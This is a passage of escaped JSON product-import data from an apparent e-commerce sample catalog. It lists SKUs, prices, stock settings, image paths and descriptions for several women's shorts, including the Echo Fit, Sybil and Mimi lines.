Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"echo-fit-compression-short-29-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh07-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh07-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh07-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh07-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh07-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Purple\"},\"1950\":{\"sku\":\"WSH07\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Echo Fit Compression Short\",\"description\":\"<p>Your muscles know it\'s go time the second you pull on the Echo Fit Compression Short. A balance of firm, stimulating squeeze with breathability, it offers the support and comfort you need to give it your all.<\\/p>\\n<p>&bull; Black compression shorts.<br \\/>&bull; High-waisted cut.<br \\/>&bull; Compression fit.<br \\/>&bull; Inseam: 1.0\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Snug|Base Layer|Compression,material=Lycra&reg;|Spandex|Wool,pattern=Solid,climate=All-weather|Indoor|Hot|Mild|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WSH07-28-Black,size=28,color=Black|sku=WSH07-28-Blue,size=28,color=Blue|sku=WSH07-28-Purple,size=28,color=Purple|sku=WSH07-29-Black,size=29,color=Black|sku=WSH07-29-Blue,size=29,color=Blue|sku=WSH07-29-Purple,size=29,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh07-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Snug|Base Layer|Compression\",\"material\":\"Lycra&reg;|Spandex|Wool\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Hot|Mild|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"1951\":{\"sku\":\"WSH08-28-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Sybil Running Short-28-Purple\",\"description\":\"<p>Fortunately, it\'s okay to look cute while you\'re working out. The Sybil Running Short combines a fun, color-blocked design with breathable mesh fabric for sporty-fun style.<\\/p>\\n<p>&bull; Blue running shorts with green waist.<br \\/>&bull; Drawstring-adjustable waist.<br \\/>&bull; 4\\\" inseam. Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sybil-running-short-28-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh08-purple_back.jpg\",\"image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh08-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Purple\"},\"1952\":{\"sku\":\"WSH08-29-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Sybil Running Short-29-Purple\",\"description\":\"<p>Fortunately, it\'s okay to look cute while you\'re working out. The Sybil Running Short combines a fun, color-blocked design with breathable mesh fabric for sporty-fun style.<\\/p>\\n<p>&bull; Blue running shorts with green waist.<br \\/>&bull; Drawstring-adjustable waist.<br \\/>&bull; 4\\\" inseam. Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sybil-running-short-29-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh08-purple_back.jpg\",\"image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh08-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Purple\"},\"1953\":{\"sku\":\"WSH08-30-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Sybil Running Short-30-Purple\",\"description\":\"<p>Fortunately, it\'s okay to look cute while you\'re working out. The Sybil Running Short combines a fun, color-blocked design with breathable mesh fabric for sporty-fun style.<\\/p>\\n<p>&bull; Blue running shorts with green waist.<br \\/>&bull; Drawstring-adjustable waist.<br \\/>&bull; 4\\\" inseam. Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sybil-running-short-30-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh08-purple_back.jpg\",\"image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh08-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Purple\"},\"1954\":{\"sku\":\"WSH08-31-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Sybil Running Short-31-Purple\",\"description\":\"<p>Fortunately, it\'s okay to look cute while you\'re working out. The Sybil Running Short combines a fun, color-blocked design with breathable mesh fabric for sporty-fun style.<\\/p>\\n<p>&bull; Blue running shorts with green waist.<br \\/>&bull; Drawstring-adjustable waist.<br \\/>&bull; 4\\\" inseam. Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sybil-running-short-31-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh08-purple_back.jpg\",\"image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh08-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Purple\"},\"1955\":{\"sku\":\"WSH08-32-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Sybil Running Short-32-Purple\",\"description\":\"<p>Fortunately, it\'s okay to look cute while you\'re working out. The Sybil Running Short combines a fun, color-blocked design with breathable mesh fabric for sporty-fun style.<\\/p>\\n<p>&bull; Blue running shorts with green waist.<br \\/>&bull; Drawstring-adjustable waist.<br \\/>&bull; 4\\\" inseam. Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sybil-running-short-32-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh08-purple_back.jpg\",\"image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh08-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Purple\"},\"1956\":{\"sku\":\"WSH08\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Sybil Running Short\",\"description\":\"<p>Fortunately, it\'s okay to look cute while you\'re working out. The Sybil Running Short combines a fun, color-blocked design with breathable mesh fabric for sporty-fun style.<\\/p>\\n<p>&bull; Blue running shorts with green waist.<br \\/>&bull; Drawstring-adjustable waist.<br \\/>&bull; 4\\\" inseam. Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Basic,material=Cocona&reg; performance fabric|Cotton|Mesh,pattern=Solid-Highlight,climate=Indoor|Hot,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WSH08-28-Purple,size=28,color=Purple|sku=WSH08-29-Purple,size=29,color=Purple|sku=WSH08-30-Purple,size=30,color=Purple|sku=WSH08-31-Purple,size=31,color=Purple|sku=WSH08-32-Purple,size=32,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh08-purple_back.jpg\",\"image\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh08-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Basic\",\"material\":\"Cocona&reg; performance fabric|Cotton|Mesh\",\"pattern\":\"Solid-Highlight\",\"climate\":\"Indoor|Hot\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1957\":{\"sku\":\"WSH09-28-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Mimi All-Purpose Short-28-Gray\",\"description\":\"<p>You can run, bike or swim in the do-anything, water-resistance Mimi Short. No need to worry about rubbing-induced soreness either, with flatlock seams and soft, chafe-resistant material.<\\/p>\\n<p>&bull; Gray\\/seafoam two-layer shorts.<br \\/>&bull; Water-resistant construction.<br \\/>&bull; Inner mesh brief for breathable support.<br \\/>&bull; 2.0\\\" inseam.<br \\/>&bull; Reflective trim for visibility.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mimi-all-purpose-short-28-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh09-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh09-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh09-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\"